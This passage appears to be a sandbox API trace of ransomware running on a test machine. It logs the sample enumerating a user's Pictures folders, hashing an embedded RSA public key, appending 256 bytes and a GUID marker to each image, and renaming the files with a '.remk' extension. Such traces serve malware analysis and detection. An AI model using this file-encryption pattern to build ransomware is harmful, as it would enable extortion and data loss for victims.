KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0236.367] CryptAcquireContextW (in: phProv=0x3adfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x3adfa50*=0x6951f0) returned 1 [0236.368] CryptCreateHash (in: hProv=0x6951f0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x3adfa58 | out: phHash=0x3adfa58) returned 1 [0236.368] CryptHashData (hHash=0x31de170, pbData=0x31c0d08, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0236.368] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x0, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x3adfa54) returned 1 [0236.368] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x31a0f08 [0236.368] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x31a0f08, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x31a0f08, pdwDataLen=0x3adfa54) returned 1 [0236.368] GetLastError () returned 0x0 [0236.368] CryptDestroyHash (hHash=0x31de170) returned 1 [0236.368] CryptReleaseContext (hProv=0x6951f0, dwFlags=0x0) returned 1 [0236.368] UuidCreate (in: Uuid=0x3adfa48 | out: Uuid=0x3adfa48) returned 0x0 [0236.368] UuidToStringA (in: Uuid=0x3adfa48, StringUuid=0x3adfa40 | out: StringUuid=0x3adfa40) returned 0x0 [0236.368] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a90 [0236.368] RpcStringFreeA (in: String=0x3adfa40 | out: String=0x3adfa40) returned 0x0 [0236.369] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x31f7b30, Size=0x218) returned 0x37b1db0 [0236.369] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x37b5b70 [0236.369] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0x3daa, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0236.369] WriteFile (in: hFile=0x640, lpBuffer=0x31c0f10*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x31c0f10*, lpNumberOfBytesWritten=0x3adfb50*=0x100, lpOverlapped=0x0) returned 1 [0236.370] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0236.370] WriteFile (in: hFile=0x640, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x3adfb50*=0x26, lpOverlapped=0x0) returned 1 [0236.370] CloseHandle (hObject=0x640) returned 1 [0236.371] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xd0) returned 0x31891a0 [0236.371] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8d0) returned 0x37bd408 [0236.371] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_dqq7i08G7zkmy4eWB\\4HUb e9qKHwuKHz-\\2kWa8l\\WJGbtDRaJ_I.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\_dqq7i08g7zkmy4ewb\\4hub e9qkhwukhz-\\2kwa8l\\wjgbtdraj_i.gif"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_dqq7i08G7zkmy4eWB\\4HUb e9qKHwuKHz-\\2kWa8l\\WJGbtDRaJ_I.gif.remk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\_dqq7i08g7zkmy4ewb\\4hub e9qkhwukhz-\\2kwa8l\\wjgbtdraj_i.gif.remk")) returned 1 [0236.373] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x71d93d40, ftCreationTime.dwHighDateTime=0x1d5e750, ftLastAccessTime.dwLowDateTime=0xdb45d100, ftLastAccessTime.dwHighDateTime=0x1d5dc5e, ftLastWriteTime.dwLowDateTime=0xdb45d100, ftLastWriteTime.dwHighDateTime=0x1d5dc5e, nFileSizeHigh=0x0, nFileSizeLow=0x9aea, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="wUkuHtHCChC.png", cAlternateFileName="WUKUHT~1.PNG")) returned 1 [0236.373] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xb0) returned 0x3185d80 [0236.373] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x106) returned 0x31f6b30 [0236.373] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_dqq7i08G7zkmy4eWB\\4HUb e9qKHwuKHz-\\2kWa8l\\wUkuHtHCChC.png") returned=".png" [0236.373] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_dqq7i08G7zkmy4eWB\\4HUb e9qKHwuKHz-\\2kWa8l\\wUkuHtHCChC.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\_dqq7i08g7zkmy4ewb\\4hub e9qkhwukhz-\\2kwa8l\\wukuhthcchc.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x640 [0236.376] GetFileSizeEx (in: hFile=0x640, lpFileSize=0x3adfb40 | out: lpFileSize=0x3adfb40*=39658) returned 1 [0236.376] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3c20000 [0236.379] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0x9ac4, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0236.379] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x3adfb78, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb78*=0x26, lpOverlapped=0x0) returned 1 [0236.381] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a58 [0236.381] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x3adfb70, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb70*=0x9aea, lpOverlapped=0x0) returned 1 [0236.382] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0236.382] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f6) returned 0x31c0d08 [0236.383] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0236.383] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0236.383] CryptAcquireContextW (in: phProv=0x3adfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x3adfa50*=0x6951f0) returned 1 [0236.384] CryptCreateHash (in: hProv=0x6951f0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x3adfa58 | out: phHash=0x3adfa58) returned 1 [0236.384] CryptHashData (hHash=0x31de170, pbData=0x31c0d08, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0236.384] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x0, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x3adfa54) returned 1 [0236.384] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x31a0f08 [0236.384] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x31a0f08, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x31a0f08, pdwDataLen=0x3adfa54) returned 1 [0236.384] GetLastError () returned 0x0 [0236.384] CryptDestroyHash (hHash=0x31de170) returned 1 [0236.384] CryptReleaseContext (hProv=0x6951f0, dwFlags=0x0) returned 1 [0236.384] UuidCreate (in: Uuid=0x3adfa48 | out: Uuid=0x3adfa48) returned 0x0 [0236.384] UuidToStringA (in: Uuid=0x3adfa48, StringUuid=0x3adfa40 | out: StringUuid=0x3adfa40) returned 0x0 [0236.384] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a90 [0236.384] RpcStringFreeA (in: String=0x3adfa40 | out: String=0x3adfa40) returned 0x0 [0236.385] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x31f7b30, Size=0x218) returned 0x37b1db0 [0236.385] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x37b5b70 [0236.385] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0x9aea, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0236.385] WriteFile (in: hFile=0x640, lpBuffer=0x31c0f10*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x31c0f10*, lpNumberOfBytesWritten=0x3adfb50*=0x100, lpOverlapped=0x0) returned 1 [0236.386] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0236.386] WriteFile (in: hFile=0x640, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x3adfb50*=0x26, lpOverlapped=0x0) returned 1 [0236.386] CloseHandle (hObject=0x640) returned 1 [0236.387] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xd0) returned 0x31891a0 [0236.387] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8d0) returned 0x37bd408 [0236.388] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_dqq7i08G7zkmy4eWB\\4HUb e9qKHwuKHz-\\2kWa8l\\wUkuHtHCChC.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\_dqq7i08g7zkmy4ewb\\4hub e9qkhwukhz-\\2kwa8l\\wukuhthcchc.png"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_dqq7i08G7zkmy4eWB\\4HUb e9qKHwuKHz-\\2kWa8l\\wUkuHtHCChC.png.remk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\_dqq7i08g7zkmy4ewb\\4hub e9qkhwukhz-\\2kwa8l\\wukuhthcchc.png.remk")) returned 1 [0236.389] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x800b4830, ftCreationTime.dwHighDateTime=0x1d5d81a, ftLastAccessTime.dwLowDateTime=0xb59e43d0, ftLastAccessTime.dwHighDateTime=0x1d5de91, ftLastWriteTime.dwLowDateTime=0xb59e43d0, ftLastWriteTime.dwHighDateTime=0x1d5de91, nFileSizeHigh=0x0, nFileSizeLow=0x15088, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Y3yQ_2 wT.gif", cAlternateFileName="Y3YQ_2~1.GIF")) returned 1 [0236.389] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xb0) returned 0x3185d80 [0236.390] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x106) returned 0x31f6b30 [0236.390] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_dqq7i08G7zkmy4eWB\\4HUb e9qKHwuKHz-\\2kWa8l\\Y3yQ_2 wT.gif") returned=".gif" [0236.390] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_dqq7i08G7zkmy4eWB\\4HUb e9qKHwuKHz-\\2kWa8l\\Y3yQ_2 wT.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\_dqq7i08g7zkmy4ewb\\4hub e9qkhwukhz-\\2kwa8l\\y3yq_2 wt.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x640 [0236.391] GetFileSizeEx (in: hFile=0x640, lpFileSize=0x3adfb40 | out: lpFileSize=0x3adfb40*=86152) returned 1 [0236.391] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3c20000 [0236.393] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0x15062, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0236.393] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x3adfb78, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb78*=0x26, lpOverlapped=0x0) returned 1 [0236.395] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a58 [0236.395] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x3adfb70, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb70*=0x15088, lpOverlapped=0x0) returned 1 [0236.396] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0236.396] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0236.396] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0236.396] CryptAcquireContextW (in: phProv=0x3adfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x3adfa50*=0x6951f0) returned 1 [0236.397] CryptCreateHash (in: hProv=0x6951f0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x3adfa58 | out: phHash=0x3adfa58) returned 1 [0236.397] CryptHashData (hHash=0x31de170, pbData=0x31c0d08, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0236.397] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x0, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x3adfa54) returned 1 [0236.397] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x31a0f08, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x31a0f08, pdwDataLen=0x3adfa54) returned 1 [0236.397] GetLastError () returned 0x0 [0236.397] CryptDestroyHash (hHash=0x31de170) returned 1 [0236.397] CryptReleaseContext (hProv=0x6951f0, dwFlags=0x0) returned 1 [0236.397] UuidCreate (in: Uuid=0x3adfa48 | out: Uuid=0x3adfa48) returned 0x0 [0236.398] UuidToStringA (in: Uuid=0x3adfa48, StringUuid=0x3adfa40 | out: StringUuid=0x3adfa40) returned 0x0 [0236.398] RpcStringFreeA (in: String=0x3adfa40 | out: String=0x3adfa40) returned 0x0 [0236.398] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x31f7b30, Size=0x218) returned 0x37b1db0 [0236.399] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0x15088, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0236.399] WriteFile (in: hFile=0x640, lpBuffer=0x31c0f10*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x31c0f10*, lpNumberOfBytesWritten=0x3adfb50*=0x100, lpOverlapped=0x0) returned 1 [0236.399] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0236.399] WriteFile (in: hFile=0x640, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x3adfb50*=0x26, lpOverlapped=0x0) returned 1 [0236.399] CloseHandle (hObject=0x640) returned 1 [0236.401] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_dqq7i08G7zkmy4eWB\\4HUb e9qKHwuKHz-\\2kWa8l\\Y3yQ_2 wT.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\_dqq7i08g7zkmy4ewb\\4hub e9qkhwukhz-\\2kwa8l\\y3yq_2 wt.gif"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_dqq7i08G7zkmy4eWB\\4HUb e9qKHwuKHz-\\2kWa8l\\Y3yQ_2 wT.gif.remk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\_dqq7i08g7zkmy4ewb\\4hub e9qkhwukhz-\\2kwa8l\\y3yq_2 wt.gif.remk")) returned 1 [0236.402] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x800b4830, ftCreationTime.dwHighDateTime=0x1d5d81a, ftLastAccessTime.dwLowDateTime=0xb59e43d0, ftLastAccessTime.dwHighDateTime=0x1d5de91, ftLastWriteTime.dwLowDateTime=0xb59e43d0, ftLastWriteTime.dwHighDateTime=0x1d5de91, nFileSizeHigh=0x0, nFileSizeLow=0x15088, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Y3yQ_2 wT.gif", cAlternateFileName="Y3YQ_2~1.GIF")) returned 0 [0236.402] FindClose (in: hFindFile=0x31de130 | out: hFindFile=0x31de130) returned 1 [0236.402] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a20 | out: hHeap=0x630000) returned 1 [0236.402] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3186060 | out: hHeap=0x630000) returned 1 [0236.402] PeekMessageW (in: lpMsg=0x3adff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adff08) returned 0 [0236.403] PeekMessageW (in: lpMsg=0x3adfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adfb74) returned 0 [0236.403] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_dqq7i08G7zkmy4eWB\\4HUb e9qKHwuKHz-\\FzGfdyB6\\") returned="FzGfdyB6\\" [0236.403] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_dqq7i08G7zkmy4eWB\\4HUb e9qKHwuKHz-\\") returned="4HUb e9qKHwuKHz-\\" [0236.403] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_dqq7i08G7zkmy4eWB\\") returned="_dqq7i08G7zkmy4eWB\\" [0236.403] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned="Pictures\\" [0236.403] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0236.403] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0236.403] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0236.403] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0236.403] PathFindFileNameW (pszPath="") returned="" [0236.403] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_dqq7i08G7zkmy4eWB\\4HUb e9qKHwuKHz-\\FzGfdyB6\\*", lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5ca429b0, ftCreationTime.dwHighDateTime=0x1d5e022, ftLastAccessTime.dwLowDateTime=0xa8a6b670, ftLastAccessTime.dwHighDateTime=0x1d5dd39, ftLastWriteTime.dwLowDateTime=0xa8a6b670, ftLastWriteTime.dwHighDateTime=0x1d5dd39, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x31de130 [0236.405] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3185d80 | out: hHeap=0x630000) returned 1 [0236.405] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5ca429b0, ftCreationTime.dwHighDateTime=0x1d5e022, ftLastAccessTime.dwLowDateTime=0xa8a6b670, ftLastAccessTime.dwHighDateTime=0x1d5dd39, ftLastWriteTime.dwLowDateTime=0xa8a6b670, ftLastWriteTime.dwHighDateTime=0x1d5dd39, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0236.406] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x178a25e0, ftCreationTime.dwHighDateTime=0x1d5de2a, ftLastAccessTime.dwLowDateTime=0xeab30660, ftLastAccessTime.dwHighDateTime=0x1d5db52, ftLastWriteTime.dwLowDateTime=0xeab30660, ftLastWriteTime.dwHighDateTime=0x1d5db52, nFileSizeHigh=0x0, nFileSizeLow=0x12ec9, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="1Zf e6GVWkTdL6S3dtG.jpg", cAlternateFileName="1ZFE6G~1.JPG")) returned 1 [0236.406] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_dqq7i08G7zkmy4eWB\\4HUb e9qKHwuKHz-\\FzGfdyB6\\1Zf e6GVWkTdL6S3dtG.jpg") returned=".jpg" [0236.406] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_dqq7i08G7zkmy4eWB\\4HUb e9qKHwuKHz-\\FzGfdyB6\\1Zf e6GVWkTdL6S3dtG.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\_dqq7i08g7zkmy4ewb\\4hub e9qkhwukhz-\\fzgfdyb6\\1zf e6gvwktdl6s3dtg.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x640 [0236.407] GetFileSizeEx (in: hFile=0x640, lpFileSize=0x3adfb40 | out: lpFileSize=0x3adfb40*=77513) returned 1 [0236.407] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3c20000 [0236.409] SetFilePointerEx (in: 